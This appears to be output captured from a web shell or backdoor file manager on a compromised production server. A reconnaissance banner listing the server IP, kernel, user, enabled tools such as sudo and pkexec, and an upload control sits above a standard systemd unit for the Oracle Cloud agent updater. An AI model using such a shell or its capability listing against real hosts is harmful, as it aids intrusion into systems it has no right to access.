Server IP : 213.35.126.208 / Your IP : 216.73.216.239 Web Server : Apache/2.4.37 (Oracle Linux Server) OpenSSL/1.1.1k System : Linux ust-wp1-prod 5.15.0-308.179.6.el8uek.x86_64 #2 SMP Wed Apr 23 10:46:57 PDT 2025 x86_64 User : tomasFtp ( 1007) PHP Version : 8.4.8 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/etc/systemd/system/multi-user.target.wants/ |
Upload File : |
# Copyright (c) 2019 Oracle and/or its affiliates. # Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl. # systemd service config file for Oracle Cloud Agent [Unit] Description=Oracle Cloud Infrastructure agent updater Documentation=https://docs.cloud.oracle.com/iaas/ ConditionFileIsExecutable=/usr/libexec/oracle-cloud-agent/updater/updater ConditionFileNotEmpty=/etc/oracle-cloud-agent/updater.yml After=local-fs.target network-online.target Requires=local-fs.target network-online.target [Service] RuntimeDirectory=oracle-cloud-agent-updater RuntimeDirectoryMode=0700 WorkingDirectory=/var/lib/oracle-cloud-agent/ ExecStart=/usr/libexec/oracle-cloud-agent/updater/updater User=oracle-cloud-agent-updater Group=oracle-cloud-agent ProtectHome=true Type=simple KillMode=process Restart=always RestartSec=60 Slice=oca.slice [Install] WantedBy=multi-user.target